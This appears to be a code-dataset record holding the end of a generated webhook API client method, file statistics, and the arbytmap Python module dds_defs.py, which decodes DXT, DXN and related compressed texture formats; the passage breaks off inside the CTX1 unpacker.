asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_web_hook_with_http_info(web_hook_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int web_hook_id: (required)
:param WebHookDto body:
:return: WebHookDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['web_hook_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_web_hook" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'web_hook_id' is set
if ('web_hook_id' not in params or
params['web_hook_id'] is None):
raise ValueError("Missing the required parameter `web_hook_id` when calling `update_web_hook`") # noqa: E501
collection_formats = {}
path_params = {}
if 'web_hook_id' in params:
path_params['webHookId'] = params['web_hook_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/webhooks/{webHookId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebHookDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 36.807393
| 421
| 0.601987
| 2,232
| 18,919
| 4.818996
| 0.087366
| 0.054016
| 0.037653
| 0.03347
| 0.915024
| 0.910004
| 0.907679
| 0.89801
| 0.89801
| 0.890945
| 0
| 0.01936
| 0.306517
| 18,919
| 513
| 422
| 36.879142
| 0.800457
| 0.326127
| 0
| 0.791822
| 0
| 0
| 0.17284
| 0.035751
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040892
| false
| 0
| 0.01487
| 0
| 0.115242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3d836ca63cf992d5271ef5f62de49f2c7a005c4
| 78,444
|
py
|
Python
|
arbytmap/dds_defs.py
|
forksnd/arbytmap
|
d43e9443988da6e7ab71e29debfc3d64f39f5c92
|
[
"MIT"
] | 2
|
2020-04-11T16:14:55.000Z
|
2020-08-25T16:05:29.000Z
|
arbytmap/dds_defs.py
|
forksnd/arbytmap
|
d43e9443988da6e7ab71e29debfc3d64f39f5c92
|
[
"MIT"
] | 2
|
2020-04-18T17:23:16.000Z
|
2020-10-04T10:08:54.000Z
|
arbytmap/dds_defs.py
|
MosesofEgypt/arbytmap
|
d43e9443988da6e7ab71e29debfc3d64f39f5c92
|
[
"MIT"
] | 2
|
2020-01-30T17:52:17.000Z
|
2020-05-10T12:59:58.000Z
|
from array import array
from math import sqrt
#this will be the reference to the bitmap convertor module.
#once the module loads this will become the reference to it.
ab = None
try:
from arbytmap.ext import dds_defs_ext
fast_dds_defs = True
except Exception:
fast_dds_defs = False
def get_texel_pixel_count(width, height):
return min(width, 4) * min(height, 4)
def initialize():
"""FOR DXT FORMATS, ALPHA CHANNELS ARE TREATED SPECIALLY,
BUT ARE EXPLICITELY PLACED HERE TO MAKE SURE THEY DONT
CAUSE CHANNEL MAP SWAPPING PROBLEMS"""
ab.FORMAT_DXT1 = "DXT1"
ab.FORMAT_DXT2 = "DXT2"
ab.FORMAT_DXT3 = "DXT3"
ab.FORMAT_DXT4 = "DXT4"
ab.FORMAT_DXT5 = "DXT5"
# uses only the alpha channel of dxt3
ab.FORMAT_DXT3A = "DXT3A"
ab.FORMAT_DXT3Y = "DXT3Y"
ab.FORMAT_DXT3AY = "DXT3AY"
# uses only the alpha channel of dxt3, and each bit is
# used as an stencil mask for each of the ARGB channels.
# this format is basically A1R1G1B1 with a dxt texel swizzle
ab.FORMAT_DXT3A1111 = "DXT3A1111" #NOT YET IMPLEMENTED
ab.FORMAT_DXT5A = "DXT5A"
ab.FORMAT_DXT5Y = "DXT5Y"
ab.FORMAT_DXT5AY = "DXT5AY"
# normal map formats
ab.FORMAT_DXT5NM = "DXT5NM" #NOT YET IMPLEMENTED
ab.FORMAT_DXN = "DXN"
ab.FORMAT_CTX1 = "CTX1"
ab.FORMAT_V8U8 = "V8U8"
ab.FORMAT_V16U16 = "V16U16"
ab.FORMAT_R8G8 = "R8G8"
ab.FORMAT_R16G16 = "R16G16"
ab.FORMAT_G8B8 = "G8B8"
ab.FORMAT_G16B16 = "G16B16"
combine = lambda base, **main: {
k: (base[k] if k not in main else main[k]) for k in
set(main.keys()).union(base.keys())}
dxt_specs = dict(
compressed=True, dds_format=True, raw_format=False,
packed_size_calc=dxt_packed_size_calc,
packed_width_calc=packed_dxt_dimension_calc,
packed_height_calc=packed_dxt_dimension_calc,
packed_typecode='I', packed_field_sizes=(2, ),
block_width=4, block_height=4,
)
ab.register_format(ab.FORMAT_DXT1, 1, **combine(
dxt_specs, bpp=4, depths=(8, 8, 8, 8),
unpacker=unpack_dxt1, packer=pack_dxt1))
for fmt in (ab.FORMAT_DXT2, ab.FORMAT_DXT3):
ab.register_format(fmt, 1, **combine(
dxt_specs, bpp=8, depths=(8, 8, 8, 8),
premultiplied=(fmt == ab.FORMAT_DXT2),
unpacker=unpack_dxt2_3, packer=pack_dxt2_3))
for fmt in (ab.FORMAT_DXT4, ab.FORMAT_DXT5):
ab.register_format(fmt, 1, **combine(
dxt_specs, bpp=8, depths=(8, 8, 8, 8),
premultiplied=(fmt == ab.FORMAT_DXT4),
unpacker=unpack_dxt4_5, packer=pack_dxt4_5))
for fmt in (ab.FORMAT_DXT3A, ab.FORMAT_DXT3Y):
ab.register_format(fmt, 1, **combine(
dxt_specs, bpp=4, depths=(8,)),
unpacker=unpack_dxt3a, packer=pack_dxt3a)
for fmt in (ab.FORMAT_DXT5A, ab.FORMAT_DXT5Y):
ab.register_format(fmt, 1, **combine(
dxt_specs, bpp=4, depths=(8,)),
unpacker=unpack_dxt5a, packer=pack_dxt5a)
ab.register_format(ab.FORMAT_DXT3AY, 1, **combine(
dxt_specs, bpp=8, depths=(8, 8),
unpacker=unpack_dxt3a, packer=pack_dxt3a))
ab.register_format(ab.FORMAT_DXT5AY, 1, **combine(
dxt_specs, bpp=8, depths=(8, 8),
unpacker=unpack_dxt5a, packer=pack_dxt5a))
ab.register_format(ab.FORMAT_DXN, 1, **combine(
dxt_specs, bpp=8, depths=(8, 8, 8),
unpacker=unpack_dxn, packer=pack_dxn))
ab.register_format(ab.FORMAT_CTX1, 1, **combine(
dxt_specs, bpp=4, depths=(8, 8, 8),
unpacker=unpack_ctx1, packer=pack_ctx1))
ab.register_format(ab.FORMAT_V8U8, 1, bpp=16, dds_format=True,
unpacker=unpack_v8u8, packer=pack_v8u8,
depths=(8,8,8), offsets=(0,8,0),
masks=(0, 0xFF, 0xFF), packed_field_sizes=(2, ))
ab.register_format(ab.FORMAT_V16U16, 1, bpp=32, dds_format=True,
unpacker=unpack_v16u16, packer=pack_v16u16,
depths=(16,16,16), offsets=(0,16,0),
masks=(0, 0xFFff, 0xFFff), packed_field_sizes=(4, ))
ab.register_format(ab.FORMAT_R8G8, 1, bpp=16, dds_format=True,
unpacker=unpack_r8g8, packer=pack_r8g8,
depths=(8,8,8), offsets=(0,8,0),
masks=(0, 0xFF, 0xFF), packed_field_sizes=(2, ))
ab.register_format(ab.FORMAT_R16G16, 1, bpp=32, dds_format=True,
unpacker=unpack_r16g16, packer=pack_r16g16,
depths=(16,16,16), offsets=(0,16,0),
masks=(0, 0xFFff, 0xFFff), packed_field_sizes=(4, ))
ab.register_format(ab.FORMAT_G8B8, 1, bpp=16, dds_format=True,
unpacker=unpack_g8b8, packer=pack_g8b8,
depths=(8,8,8), offsets=(8,0,0),
masks=(0xFF, 0xFF, 0), packed_field_sizes=(2, ))
ab.register_format(ab.FORMAT_G16B16, 1, bpp=32, dds_format=True,
unpacker=unpack_g16b16, packer=pack_g16b16,
depths=(16,16,16), offsets=(16,0,0),
masks=(0xFFff, 0xFFff, 0), packed_field_sizes=(4, ))
def _dxt_swizzle(src_pixels, orig_width, orig_height, channel_ct, swizz=False):
width, height = clip_dxt_dimensions(orig_width, orig_height)
txl_ct_x = 1 if width < 4 else width // 4
txl_ct_y = 1 if height < 4 else height // 4
txl_w = 4 if txl_ct_x > 1 else orig_width
txl_h = 4 if txl_ct_y > 1 else orig_height
assert len(src_pixels) % channel_ct == 0
dst_pixels = ab.bitmap_io.make_array(src_pixels.typecode, len(src_pixels))
# 4 channels per pixel, 16 pixels per texel
if fast_dds_defs:
dds_defs_ext.dxt_swizzle(
src_pixels, dst_pixels, swizz, channel_ct,
txl_ct_y, txl_ct_x, txl_w, txl_h)
else:
txl_stride = txl_h * width * channel_ct
tx_block_offs = tuple(range(0, width * channel_ct, txl_w * channel_ct))
y_block_offs = tuple(y * width * channel_ct for y in range(txl_h))
x_block_offs = tuple(range(0, txl_w * channel_ct, channel_ct))
c_block_offs = tuple(range(channel_ct))
i = j = 0
for tx_y in range(txl_ct_y):
if swizz:
for tx in tx_block_offs:
i_tx = i + tx
for y in y_block_offs:
i_tx_y = i_tx + y
for x in x_block_offs:
i_tx_yx = i_tx_y + x
for c in c_block_offs:
dst_pixels[j] = src_pixels[i_tx_yx + c]
j += 1
else:
for tx in tx_block_offs:
i_tx = i + tx
for y in y_block_offs:
i_tx_y = i_tx + y
for x in x_block_offs:
i_tx_yx = i_tx_y + x
for c in c_block_offs:
dst_pixels[i_tx_yx + c] = src_pixels[j]
j += 1
i += txl_stride
return dst_pixels
def unswizzle_dxt(pixels, orig_width, orig_height, channel_ct):
return _dxt_swizzle(pixels, orig_width, orig_height, channel_ct, False)
def swizzle_dxt(pixels, orig_width, orig_height, channel_ct):
return _dxt_swizzle(pixels, orig_width, orig_height, channel_ct, True)
def dxt_packed_size_calc(fmt, width, height, depth=1):
width, height = clip_dxt_dimensions(width, height)
return (ab.BITS_PER_PIXEL[fmt] * height * width * depth)//8
def packed_dxt_dimension_calc(dim, mip_level, tiled=False):
dim = dim >> mip_level
if dim <= 4: return 4
return dim + (4 - (dim % 4)) % 4
def clip_dxt_dimensions(width, height):
return (packed_dxt_dimension_calc(width, 0),
packed_dxt_dimension_calc(height, 0))
def unpack_dxt1(arby, bitmap_index, width, height, depth=1):
packed = arby.texture_block[bitmap_index]
assert packed.typecode == 'I'
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
pixels_per_texel = (width//texel_width)*(height//texel_height)
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_dxt1(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel, ucc, array("b", chan_map[: 4]))
else:
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(pixels_per_texel)
upscales = tuple(tuple(scale) for scale in upscales)
#create the arrays to hold the color channel data
c_0 = [255,0,0,0]
c_1 = [255,0,0,0]
c_2 = [255,0,0,0]
c_3 = [255,0,0,0]
transparent = [0,0,0,0]
#stores the colors in a way we can easily access them
colors = [c_0, c_1, c_2, c_3]
#loop through each texel
for i in range(len(packed)//2):
pxl_i = i*channels_per_texel
j = i*2
#if the format DXT1 then the two entries in the array
#are the colors and the color indexing in that order.
color0 = packed[j] & 65535
color1 = (packed[j] >> 16) & 65535
color_idx = packed[j+1]
#unpack the colors
c_0[1] = (((color0>>11) & 31)*255 + 15)//31
c_1[1] = (((color1>>11) & 31)*255 + 15)//31
c_0[2] = (((color0>>5) & 63)*255 + 31)//63
c_1[2] = (((color1>>5) & 63)*255 + 31)//63
c_1[3] = ((color1 & 31)*255 + 15)//31
c_0[3] = ((color0 & 31)*255 + 15)//31
#if the first color is a larger integer
#then color key transparency is NOT used
if color0 > color1:
c_2[1] = (c_0[1]*2 + c_1[1])//3
c_2[2] = (c_0[2]*2 + c_1[2])//3
c_2[3] = (c_0[3]*2 + c_1[3])//3
c_3[:] = [255, (c_0[1] + 2*c_1[1])//3,
(c_0[2] + 2*c_1[2])//3, (c_0[3] + 2*c_1[3])//3]
else:
c_2[1] = (c_0[1]+c_1[1])//2
c_2[2] = (c_0[2]+c_1[2])//2
c_2[3] = (c_0[3]+c_1[3])//2
c_3[:] = transparent
for j in pixel_indices:
color = colors[(color_idx >> (j*2))&3]
off = j*ucc + pxl_i
dst_chan = 0
for src_chan in chan_map:
if src_chan < 0 and dst_chan == 0:
# alpha and not reading alpha. set to full white
unpacked[off] = unpack_max
elif src_chan >= 0:
unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
dst_chan += 1
return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt2_3(arby, bitmap_index, width, height, depth=1):
packed = arby.texture_block[bitmap_index]
assert packed.typecode == 'I'
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
pixels_per_texel = (width//texel_width)*(height//texel_height)
#create a new array to hold the pixels after we unpack them
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_dxt2_3(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel, ucc, array("b", chan_map[: 4]))
else:
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(pixels_per_texel)
upscales = tuple(tuple(scale) for scale in upscales)
#create the arrays to hold the color channel data
c_0 = [255,0,0,0]
c_1 = [255,0,0,0]
c_2 = [255,0,0,0]
c_3 = [255,0,0,0]
#stores the colors in a way we can easily access them
colors = [c_0, c_1, c_2, c_3]
#loop through each texel
for i in range(len(packed)//4):
pxl_i = i*channels_per_texel
j = i*4
#DXT2/3 is much simpler than DXT4/5
alpha = (packed[j+1]<<32) | packed[j]
color0 = packed[j+2] & 65535
color1 = (packed[j+2] >> 16) & 65535
color_idx = packed[j+3]
if color0 < color1:
color0, color1 = color1, color0
#unpack the colors
c_0[1] = (((color0>>11) & 31)*255 + 15)//31
c_1[1] = (((color1>>11) & 31)*255 + 15)//31
c_0[2] = (((color0>>5) & 63)*255 + 31)//63
c_1[2] = (((color1>>5) & 63)*255 + 31)//63
c_1[3] = ((color1 & 31)*255 + 15)//31
c_0[3] = ((color0 & 31)*255 + 15)//31
c_2[1] = (c_0[1]*2 + c_1[1])//3
c_2[2] = (c_0[2]*2 + c_1[2])//3
c_2[3] = (c_0[3]*2 + c_1[3])//3
c_3[1] = (c_0[1] + c_1[1]*2)//3
c_3[2] = (c_0[2] + c_1[2]*2)//3
c_3[3] = (c_0[3] + c_1[3]*2)//3
for j in pixel_indices:
color = colors[(color_idx >> (j*2))&3]
off = j*ucc + pxl_i
a = (((alpha >> (j*4)) & 15)*255)//15
dst_chan = 0
for src_chan in chan_map:
if src_chan < 0 and dst_chan == 0:
# alpha and not reading alpha. set to full white
unpacked[off] = unpack_max
elif src_chan > 0:
unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
elif src_chan == 0:
unpacked[off + dst_chan] = upscales[dst_chan][a]
dst_chan += 1
return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt4_5(arby, bitmap_index, width, height, depth=1):
packed = arby.texture_block[bitmap_index]
assert packed.typecode == 'I'
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
pixels_per_texel = (width//texel_width)*(height//texel_height)
#create a new array to hold the pixels after we unpack them
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_dxt4_5(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel, ucc, array("b", chan_map[: 4]))
else:
a_lookup = [0,0,0,0,0,0,0,0]
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(pixels_per_texel)
upscales = tuple(tuple(scale) for scale in upscales)
#create the arrays to hold the color channel data
c_0 = [255,0,0,0]
c_1 = [255,0,0,0]
c_2 = [255,0,0,0]
c_3 = [255,0,0,0]
#stores the colors in a way we can easily access them
colors = [c_0, c_1, c_2, c_3]
#loop through each texel
for i in range(len(packed)//4):
pxl_i = i*channels_per_texel
j = i*4
a_lookup[0] = alpha0 = packed[j] & 255
a_lookup[1] = alpha1 = (packed[j] >> 8) & 255
alpha_idx = ((packed[j]>>16) & 65535) | (packed[j+1] << 16)
#depending on which alpha is larger
#the indexing is calculated differently
if alpha0 > alpha1:
a_lookup[2] = (alpha0*6 + alpha1)//7
a_lookup[3] = (alpha0*5 + alpha1*2)//7
a_lookup[4] = (alpha0*4 + alpha1*3)//7
a_lookup[5] = (alpha0*3 + alpha1*4)//7
a_lookup[6] = (alpha0*2 + alpha1*5)//7
a_lookup[7] = (alpha0 + alpha1*6)//7
else:
a_lookup[2] = (alpha0*4 + alpha1)//5
a_lookup[3] = (alpha0*3 + alpha1*2)//5
a_lookup[4] = (alpha0*2 + alpha1*3)//5
a_lookup[5] = (alpha0 + alpha1*4)//5
a_lookup[6] = 0
a_lookup[7] = 255
#half of the first array entry in DXT4/5 format is both
#alpha values and the first third of the indexing
color0 = packed[j+2] & 65535
color1 = (packed[j+2]>>16) & 65535
color_idx = packed[j+3]
if color0 < color1:
color0, color1 = color1, color0
#unpack the colors
c_0[1] = (((color0>>11) & 31)*255 + 15)//31
c_1[1] = (((color1>>11) & 31)*255 + 15)//31
c_0[2] = (((color0>>5) & 63)*255 + 31)//63
c_1[2] = (((color1>>5) & 63)*255 + 31)//63
c_1[3] = ((color1 & 31)*255 + 15)//31
c_0[3] = ((color0 & 31)*255 + 15)//31
c_2[1] = (c_0[1]*2 + c_1[1])//3
c_2[2] = (c_0[2]*2 + c_1[2])//3
c_2[3] = (c_0[3]*2 + c_1[3])//3
c_3[1] = (c_0[1] + c_1[1]*2)//3
c_3[2] = (c_0[2] + c_1[2]*2)//3
c_3[3] = (c_0[3] + c_1[3]*2)//3
for j in pixel_indices:
color = colors[(color_idx >> (j*2))&3]
off = j*ucc + pxl_i
a = a_lookup[(alpha_idx >> (j*3))&7]
dst_chan = 0
for src_chan in chan_map:
if src_chan < 0 and dst_chan == 0:
# alpha and not reading alpha. set to full white
unpacked[off] = unpack_max
elif src_chan > 0:
unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
elif src_chan == 0:
unpacked[off + dst_chan] = upscales[dst_chan][a]
dst_chan += 1
return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt3a(arby, bitmap_index, width, height, depth=1):
packed = arby.texture_block[bitmap_index]
assert packed.typecode == 'I'
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
scc = arby.source_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
pixels_per_texel = (width//texel_width)*(height//texel_height)
#create a new array to hold the pixels after we unpack them
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_dxt3a(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel, ucc, scc, array("b", chan_map[: 4]))
else:
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(pixels_per_texel)
upscales = tuple(tuple(scale) for scale in upscales)
#loop through each texel
for dst_chan in range(ucc):
scale = upscales[dst_chan]
src_chan = chan_map[dst_chan]
if src_chan < 0:
# not reading anything for this destination channel.
# either leave it full black, or set it to full white.
if dst_chan == 0:
# set alpha to full white
for off in range(0, len(unpacked), ucc):
unpacked[off] = unpack_max
continue
pxl_i = dst_chan
for i in range(2 * src_chan, len(packed), 2 * scc):
alpha = (packed[i+1]<<32) | packed[i]
for j in pixel_indices:
unpacked[pxl_i] = scale[(((alpha>>(j*4)) & 15)*255)//15]
pxl_i += ucc
return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt5a(arby, bitmap_index, width, height, depth=1):
packed = arby.texture_block[bitmap_index]
assert packed.typecode == 'I'
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
scc = arby.source_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
pixels_per_texel = (width//texel_width)*(height//texel_height)
#create a new array to hold the pixels after we unpack them
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_dxt5a(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel, ucc, scc, array("b", chan_map[: 4]))
else:
lookup = [0,0,0,0,0,0,0,0]
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(pixels_per_texel)
upscales = tuple(tuple(scale) for scale in upscales)
#loop through each texel
for dst_chan in range(ucc):
scale = upscales[dst_chan]
src_chan = chan_map[dst_chan]
if src_chan < 0:
# not reading anything for this destination channel.
# either leave it full black, or set it to full white.
if dst_chan == 0:
# set alpha to full white
for off in range(0, len(unpacked), ucc):
unpacked[off] = unpack_max
continue
pxl_i = dst_chan
for i in range(2 * src_chan, len(packed), 2 * scc):
lookup[0] = val0 = packed[i] & 255
lookup[1] = val1 = (packed[i] >> 8) & 255
idx = ((packed[i]>>16) & 65535) | (packed[i+1] << 16)
# depending on which value is larger
# the indexing is calculated differently
if val0 > val1:
lookup[2] = (val0*6 + val1)//7
lookup[3] = (val0*5 + val1*2)//7
lookup[4] = (val0*4 + val1*3)//7
lookup[5] = (val0*3 + val1*4)//7
lookup[6] = (val0*2 + val1*5)//7
lookup[7] = (val0 + val1*6)//7
else:
lookup[2] = (val0*4 + val1)//5
lookup[3] = (val0*3 + val1*2)//5
lookup[4] = (val0*2 + val1*3)//5
lookup[5] = (val0 + val1*4)//5
lookup[6] = 0
lookup[7] = 255
for j in pixel_indices:
unpacked[pxl_i] = scale[lookup[(idx >> (j*3))&7]]
pxl_i += ucc
return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxn(arby, bitmap_index, width, height, depth=1):
packed = arby.texture_block[bitmap_index]
assert packed.typecode == 'I'
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
zero_point = sign_mask = 0x80
mask = sign_mask - 1
mask_sq = mask**2
ucc = arby.unpacked_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
pixels_per_texel = (width//texel_width)*(height//texel_height)
channels_per_texel = ucc*pixels_per_texel
#create a new array to hold the pixels after we unpack them
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_dxn(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel, ucc, array("b", chan_map[: 4]))
else:
# convert to tuples for faster access
upscales = tuple(tuple(scale) for scale in upscales)
pixel_indices = range(pixels_per_texel)
r_lookup = [0,0,0,0,0,0,0,0]
g_lookup = [0,0,0,0,0,0,0,0]
#loop through each texel
for i in range(len(packed)//4):
pxl_i = i*channels_per_texel
j = i*4
g_lookup[0] = g0 = packed[j]&255
g_lookup[1] = g1 = (packed[j]>>8)&255
g_idx = ((packed[j]>>16)&65535) + (packed[j+1]<<16)
r_lookup[0] = r0 = packed[j+2]&255
r_lookup[1] = r1 = (packed[j+2]>>8)&255
r_idx = ((packed[j+2]>>16)&65535) + (packed[j+3]<<16)
#depending on which alpha value is larger
#the indexing is calculated differently
if g0 > g1:
g_lookup[2] = (g0*6 + g1 )//7
g_lookup[3] = (g0*5 + g1*2)//7
g_lookup[4] = (g0*4 + g1*3)//7
g_lookup[5] = (g0*3 + g1*4)//7
g_lookup[6] = (g0*2 + g1*5)//7
g_lookup[7] = (g0 + g1*6)//7
else:
g_lookup[2] = (g0*4 + g1 )//5
g_lookup[3] = (g0*3 + g1*2)//5
g_lookup[4] = (g0*2 + g1*3)//5
g_lookup[5] = (g0 + g1*4)//5
g_lookup[6] = 0
g_lookup[7] = 255
if r0 > r1:
r_lookup[2] = (r0*6 + r1 )//7
r_lookup[3] = (r0*5 + r1*2)//7
r_lookup[4] = (r0*4 + r1*3)//7
r_lookup[5] = (r0*3 + r1*4)//7
r_lookup[6] = (r0*2 + r1*5)//7
r_lookup[7] = (r0 + r1*6)//7
else:
r_lookup[2] = (r0*4 + r1 )//5
r_lookup[3] = (r0*3 + r1*2)//5
r_lookup[4] = (r0*2 + r1*3)//5
r_lookup[5] = (r0 + r1*4)//5
r_lookup[6] = 0
r_lookup[7] = 255
for k in pixel_indices:
g = y = g_lookup[(g_idx>>(k*3))&7]
r = x = r_lookup[(r_idx>>(k*3))&7]
off = k*ucc + pxl_i
# we're normalizing the coordinates
# here, not just unpacking them
x = r&mask if r&sign_mask else zero_point - r
y = g&mask if g&sign_mask else zero_point - g
d = mask_sq - x**2 - y**2
if d > 0:
b = int(sqrt(d)) + zero_point
else:
b = zero_point
n_len = sqrt(mask_sq - d)/mask
x = int(x/n_len)
y = int(y/n_len)
r = x + zero_point if r&sign_mask else zero_point - x
g = y + zero_point if g&sign_mask else zero_point - y
color = [0, r, g, b]
dst_chan = 0
for src_chan in chan_map:
if src_chan <= 0 or dst_chan == 0:
# set alpha to full white
unpacked[off] = unpack_max
elif src_chan >= 0:
unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
dst_chan += 1
return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_ctx1(arby, bitmap_index, width, height, depth=1):
packed = arby.texture_block[bitmap_index]
assert packed.typecode == 'I'
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
zero_point = sign_mask = 0x80
mask = sign_mask - 1
mask_sq = mask**2
ucc = arby.unpacked_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
pixels_per_texel = (width//texel_width)*(height//texel_height)
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(pixels_per_texel)
#create a new array to hold the pixels after we unpack them
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
